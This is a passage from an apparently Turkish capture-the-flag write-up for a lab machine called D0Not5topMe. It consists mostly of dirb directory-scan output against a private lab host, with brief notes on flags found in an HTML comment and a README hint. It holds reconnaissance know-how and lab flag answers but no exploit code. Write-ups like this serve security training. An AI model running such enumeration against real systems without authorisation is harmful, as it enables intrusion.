+ http://192.168.1.22/blog/admin/blog/1/index.php (CODE:200|SIZE:0)            
                                                                               
---- Entering directory: http://192.168.1.22/contact/admin/contact/1/ ----
==> DIRECTORY: http://192.168.1.22/contact/admin/contact/1/2/                  
+ http://192.168.1.22/contact/admin/contact/1/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/feed/admin/feed/1/ ----
==> DIRECTORY: http://192.168.1.22/feed/admin/feed/1/2/                        
+ http://192.168.1.22/feed/admin/feed/1/index.php (CODE:200|SIZE:0)            
                                                                               
---- Entering directory: http://192.168.1.22/mint/admin/mint/1/ ----
==> DIRECTORY: http://192.168.1.22/mint/admin/mint/1/2/                        
+ http://192.168.1.22/mint/admin/mint/1/index.php (CODE:200|SIZE:0)            
                                                                               
---- Entering directory: http://192.168.1.22/plugins/admin/plugins/1/ ----
==> DIRECTORY: http://192.168.1.22/plugins/admin/plugins/1/2/                  
+ http://192.168.1.22/plugins/admin/plugins/1/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/search/admin/search/1/ ----
==> DIRECTORY: http://192.168.1.22/search/admin/search/1/2/                    
+ http://192.168.1.22/search/admin/search/1/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/support/admin/support/1/ ----
==> DIRECTORY: http://192.168.1.22/support/admin/support/1/2/                  
+ http://192.168.1.22/support/admin/support/1/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/tag/admin/tag/1/ ----
==> DIRECTORY: http://192.168.1.22/tag/admin/tag/1/2/                          
+ http://192.168.1.22/tag/admin/tag/1/index.php (CODE:200|SIZE:0)              
                                                                               
---- Entering directory: http://192.168.1.22/themes/admin/themes/1/ ----
==> DIRECTORY: http://192.168.1.22/themes/admin/themes/1/2/                    
+ http://192.168.1.22/themes/admin/themes/1/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/trackback/admin/trackback/1/ ----
==> DIRECTORY: http://192.168.1.22/trackback/admin/trackback/1/2/              
+ http://192.168.1.22/trackback/admin/trackback/1/index.php (CODE:200|SIZE:0)  
                                                                               
---- Entering directory: http://192.168.1.22/wp-admin/admin/wp-admin/1/ ----
==> DIRECTORY: http://192.168.1.22/wp-admin/admin/wp-admin/1/2/                
+ http://192.168.1.22/wp-admin/admin/wp-admin/1/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/wp-content/admin/wp-content/1/ ----
==> DIRECTORY: http://192.168.1.22/wp-content/admin/wp-content/1/2/            
+ http://192.168.1.22/wp-content/admin/wp-content/1/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/wp-includes/admin/wp-includes/1/ ----
==> DIRECTORY: http://192.168.1.22/wp-includes/admin/wp-includes/1/2/          
+ http://192.168.1.22/wp-includes/admin/wp-includes/1/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/ ----
==> DIRECTORY: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/2/            
+ http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/archive/admin/archive/1/2/ ----
+ http://192.168.1.22/archive/admin/archive/1/2/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/blog/admin/blog/1/2/ ----
+ http://192.168.1.22/blog/admin/blog/1/2/index.php (CODE:200|SIZE:0)          
                                                                               
---- Entering directory: http://192.168.1.22/contact/admin/contact/1/2/ ----
+ http://192.168.1.22/contact/admin/contact/1/2/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/feed/admin/feed/1/2/ ----
+ http://192.168.1.22/feed/admin/feed/1/2/index.php (CODE:200|SIZE:0)          
                                                                               
---- Entering directory: http://192.168.1.22/mint/admin/mint/1/2/ ----
+ http://192.168.1.22/mint/admin/mint/1/2/index.php (CODE:200|SIZE:0)          
                                                                               
---- Entering directory: http://192.168.1.22/plugins/admin/plugins/1/2/ ----
+ http://192.168.1.22/plugins/admin/plugins/1/2/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/search/admin/search/1/2/ ----
+ http://192.168.1.22/search/admin/search/1/2/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/support/admin/support/1/2/ ----
+ http://192.168.1.22/support/admin/support/1/2/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/tag/admin/tag/1/2/ ----
+ http://192.168.1.22/tag/admin/tag/1/2/index.php (CODE:200|SIZE:0)            
                                                                               
---- Entering directory: http://192.168.1.22/themes/admin/themes/1/2/ ----
+ http://192.168.1.22/themes/admin/themes/1/2/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/trackback/admin/trackback/1/2/ ----
+ http://192.168.1.22/trackback/admin/trackback/1/2/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/wp-admin/admin/wp-admin/1/2/ ----
+ http://192.168.1.22/wp-admin/admin/wp-admin/1/2/index.php (CODE:200|SIZE:0)  
                                                                               
---- Entering directory: http://192.168.1.22/wp-content/admin/wp-content/1/2/ ----
+ http://192.168.1.22/wp-content/admin/wp-content/1/2/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/wp-includes/admin/wp-includes/1/2/ ----
+ http://192.168.1.22/wp-includes/admin/wp-includes/1/2/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/2/ ----
+ http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/2/index.php (CODE:200|SIZE:0)
                                                                               
-----------------
END_TIME: Fri May 12 12:42:12 2017
DOWNLOADED: 696412 - FOUND: 154

Boş dizin ve sayfaları elediğimde ve dönen istekleri incelediğimde http://192.168.1.22/control/index.html adresinde ilk bayrağı yakalıyorum. İster wget komutuyla ister view-source:http://192.168.1.22/control/index.html adresiyle flag elde edilebilir.

<!– FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w –>

Ayrıca açıklama satırı olarak bize D0Not5topMe.ctf adresi verilmiş.

 <div class="fluid-ratio-resize"></div>
            <!-- M3gusta said he hasn't had time to get this w0rKING.
            Don't think he's quite in the 20n3 these days since his MadBro made that 7r4n5f3r, Just Couldnt [email protected] Da D0Not5topMe.ctf --!>            

 </div>

Siteyi incelerken http://192.168.1.22/control/js/README.MadBro adresine bakıyorum ve içeriği;

###########################################################
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
# M4K3 5UR3 2 S3TUP Y0UR /3TC/H05T5 N3XT T1M3 L0053R...   #
# 1T'5 D0Not5topMe.ctf !!!!                               #
# 1M 00T4 H33R..                                          #
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
###########################################################

                FL101110_10:111101011101
                1r101010q10svdfsxk1001i1
                11ry100f10srtr1100010h10
FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

İpucunda söylendiği gibi /etc/hosts adresime D0Not5topMe.ctf’i ekliyorum.

Yeni adresimize yine dirb ile dizin taraması yaptırıyorum.

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri May 12 13:26:41 2017
URL_BASE: http://D0Not5topMe.ctf/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://D0Not5topMe.ctf/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/adm/                                     
==> DIRECTORY: http://D0Not5topMe.ctf/assets/                                  
==> DIRECTORY: http://D0Not5topMe.ctf/bin/                                     
==> DIRECTORY: http://D0Not5topMe.ctf/cache/                                   
==> DIRECTORY: http://D0Not5topMe.ctf/config/                                  
==> DIRECTORY: http://D0Not5topMe.ctf/docs/                                    
==> DIRECTORY: http://D0Not5topMe.ctf/download/                                
==> DIRECTORY: http://D0Not5topMe.ctf/ext/                                     
==> DIRECTORY: http://D0Not5topMe.ctf/files/                                   
==> DIRECTORY: http://D0Not5topMe.ctf/images/                                  
==> DIRECTORY: http://D0Not5topMe.ctf/includes/                                
+ http://D0Not5topMe.ctf/index.php (CODE:200|SIZE:12659)                       
==> DIRECTORY: http://D0Not5topMe.ctf/language/                                
==> DIRECTORY: http://D0Not5topMe.ctf/manual/                                  
==> DIRECTORY: http://D0Not5topMe.ctf/phpbb/                                   
==> DIRECTORY: http://D0Not5topMe.ctf/phpBB3/                                  
+ http://D0Not5topMe.ctf/server-status (CODE:403|SIZE:222)                     
==> DIRECTORY: http://D0Not5topMe.ctf/store/                                   
==> DIRECTORY: http://D0Not5topMe.ctf/styles/                                  
==> DIRECTORY: http://D0Not5topMe.ctf/vendor/                                  
+ http://D0Not5topMe.ctf/web.config (CODE:200|SIZE:1086)                       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/adm/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/adm/images/                              
+ http://D0Not5topMe.ctf/adm/index.php (CODE:302|SIZE:0)                       
==> DIRECTORY: http://D0Not5topMe.ctf/adm/style/                               
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/bin/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/cache/ ----
+ http://D0Not5topMe.ctf/cache/index.htm (CODE:200|SIZE:169)                   
==> DIRECTORY: http://D0Not5topMe.ctf/cache/installer/                         
==> DIRECTORY: http://D0Not5topMe.ctf/cache/production/                        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/download/ ----
+ http://D0Not5topMe.ctf/download/index.htm (CODE:200|SIZE:169)                
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/ext/ ----
+ http://D0Not5topMe.ctf/ext/index.htm (CODE:200|SIZE:169)                     
==> DIRECTORY: http://D0Not5topMe.ctf/ext/phpbb/                               
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/files/ ----
+ http://D0Not5topMe.ctf/files/index.htm (CODE:200|SIZE:169)                   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/images/avatars/                          
==> DIRECTORY: http://D0Not5topMe.ctf/images/icons/                            
+ http://D0Not5topMe.ctf/images/index.htm (CODE:200|SIZE:169)                  
==> DIRECTORY: http://D0Not5topMe.ctf/images/ranks/                            
==> DIRECTORY: http://D0Not5topMe.ctf/images/smilies/                          
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/includes/acp/                            
==> DIRECTORY: http://D0Not5topMe.ctf/includes/diff/                           
==> DIRECTORY: http://D0Not5topMe.ctf/includes/hooks/                          
+ http://D0Not5topMe.ctf/includes/index.htm (CODE:200|SIZE:169)                
==> DIRECTORY: http://D0Not5topMe.ctf/includes/mcp/                            
==> DIRECTORY: http://D0Not5topMe.ctf/includes/ucp/                            
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/language/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/language/en/                             
+ http://D0Not5topMe.ctf/language/index.htm (CODE:200|SIZE:169)                
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/images/                           
+ http://D0Not5topMe.ctf/manual/index.html (CODE:200|SIZE:626)                 
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/style/                            
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/                            
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/phpbb/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/phpBB3/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/store/ ----
+ http://D0Not5topMe.ctf/store/index.htm (CODE:200|SIZE:169)                   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/styles/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/adm/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/adm/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/cache/installer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/cache/production/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/ext/phpbb/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/avatars/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/images/avatars/gallery/                  
+ http://D0Not5topMe.ctf/images/avatars/index.htm (CODE:200|SIZE:169)          
==> DIRECTORY: http://D0Not5topMe.ctf/images/avatars/upload/                   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/icons/ ----
+ http://D0Not5topMe.ctf/images/icons/index.htm (CODE:200|SIZE:169)            
==> DIRECTORY: http://D0Not5topMe.ctf/images/icons/misc/                       
==> DIRECTORY: http://D0Not5topMe.ctf/images/icons/smile/                      
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/ranks/ ----
+ http://D0Not5topMe.ctf/images/ranks/index.htm (CODE:200|SIZE:169)            
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/smilies/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/acp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/diff/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/hooks/ ----
+ http://D0Not5topMe.ctf/includes/hooks/index.php (CODE:200|SIZE:0)            
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/mcp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/ucp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/language/en/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/language/en/acp/                         
==> DIRECTORY: http://D0Not5topMe.ctf/language/en/email/                       
==> DIRECTORY: http://D0Not5topMe.ctf/language/en/help/                        
+ http://D0Not5topMe.ctf/language/en/index.htm (CODE:200|SIZE:169)             
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/howto/                         
+ http://D0Not5topMe.ctf/manual/da/index.html (CODE:200|SIZE:9041)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/howto/                         
+ http://D0Not5topMe.ctf/manual/de/index.html (CODE:200|SIZE:9290)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/howto/                         
+ http://D0Not5topMe.ctf/manual/en/index.html (CODE:200|SIZE:9206)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/howto/                         
+ http://D0Not5topMe.ctf/manual/es/index.html (CODE:200|SIZE:9255)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/howto/                         
+ http://D0Not5topMe.ctf/manual/fr/index.html (CODE:200|SIZE:9479)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/howto/                         
+ http://D0Not5topMe.ctf/manual/ja/index.html (CODE:200|SIZE:9649)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/howto/                         
+ http://D0Not5topMe.ctf/manual/ko/index.html (CODE:200|SIZE:8513)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/howto/                         
+ http://D0Not5topMe.ctf/manual/tr/index.html (CODE:200|SIZE:9416)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/developer/                  
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/faq/                        
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/howto/                      
+ http://D0Not5topMe.ctf/manual/zh-cn/index.html (CODE:200|SIZE:8884)          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/misc/                       
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/mod/                        
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/programs/                   
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/ssl/                        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/avatars/gallery/ ----
+ http://D0Not5topMe.ctf/images/avatars/gallery/index.htm (CODE:200|SIZE:169)  
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/avatars/upload/ ----
+ http://D0Not5topMe.ctf/images/avatars/upload/index.htm (CODE:200|SIZE:169)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/icons/misc/ ----
+ http://D0Not5topMe.ctf/images/icons/misc/index.htm (CODE:200|SIZE:169)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/icons/smile/ ----
+ http://D0Not5topMe.ctf/images/icons/smile/index.htm (CODE:200|SIZE:169)      
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/language/en/acp/ ----
+ http://D0Not5topMe.ctf/language/en/acp/index.htm (CODE:200|SIZE:169)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/language/en/email/ ----
+ http://D0Not5topMe.ctf/language/en/email/index.htm (CODE:200|SIZE:169)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/language/en/help/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/developer/ ----
+ http://D0Not5topMe.ctf/manual/da/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/faq/ ----
+ http://D0Not5topMe.ctf/manual/da/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/howto/ ----
+ http://D0Not5topMe.ctf/manual/da/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/misc/ ----
+ http://D0Not5topMe.ctf/manual/da/misc/index.html (CODE:200|SIZE:5106)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/mod/ ----
+ http://D0Not5topMe.ctf/manual/da/mod/index.html (CODE:200|SIZE:22377)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/programs/ ----
+ http://D0Not5topMe.ctf/manual/da/programs/index.html (CODE:200|SIZE:6897)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/ssl/ ----
+ http://D0Not5topMe.ctf/manual/da/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/developer/ ----
+ http://D0Not5topMe.ctf/manual/de/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/faq/ ----
+ http://D0Not5topMe.ctf/manual/de/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/howto/ ----
+ http://D0Not5topMe.ctf/manual/de/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/misc/ ----
+ http://D0Not5topMe.ctf/manual/de/misc/index.html (CODE:200|SIZE:5106)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/mod/ ----
+ http://D0Not5topMe.ctf/manual/de/mod/index.html (CODE:200|SIZE:22569)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/programs/ ----
+ http://D0Not5topMe.ctf/manual/de/programs/index.html (CODE:200|SIZE:6897)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/ssl/ ----
+ http://D0Not5topMe.ctf/manual/de/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/developer/ ----
+ http://D0Not5topMe.ctf/manual/en/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/faq/ ----
+ http://D0Not5topMe.ctf/manual/en/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/howto/ ----
+ http://D0Not5topMe.ctf/manual/en/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/misc/ ----
+ http://D0Not5topMe.ctf/manual/en/misc/index.html (CODE:200|SIZE:5106)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/mod/ ----
+ http://D0Not5topMe.ctf/manual/en/mod/index.html (CODE:200|SIZE:22377)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/programs/ ----
+ http://D0Not5topMe.ctf/manual/en/programs/index.html (CODE:200|SIZE:6897)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/ssl/ ----
+ http://D0Not5topMe.ctf/manual/en/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/developer/ ----
+ http://D0Not5topMe.ctf/manual/es/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/faq/ ----
+ http://D0Not5topMe.ctf/manual/es/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/howto/ ----
+ http://D0Not5topMe.ctf/manual/es/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/misc/ ----
+ http://D0Not5topMe.ctf/manual/es/misc/index.html (CODE:200|SIZE:5106)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/mod/ ----
+ http://D0Not5topMe.ctf/manual/es/mod/index.html (CODE:200|SIZE:22752)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/programs/ ----
+ http://D0Not5topMe.ctf/manual/es/programs/index.html (CODE:200|SIZE:6298)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/ssl/ ----
+ http://D0Not5topMe.ctf/manual/es/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/developer/ ----
+ http://D0Not5topMe.ctf/manual/fr/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/faq/ ----
+ http://D0Not5topMe.ctf/manual/fr/faq/index.html (CODE:200|SIZE:3604)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/howto/ ----
+ http://D0Not5topMe.ctf/manual/fr/howto/index.html (CODE:200|SIZE:7136)       
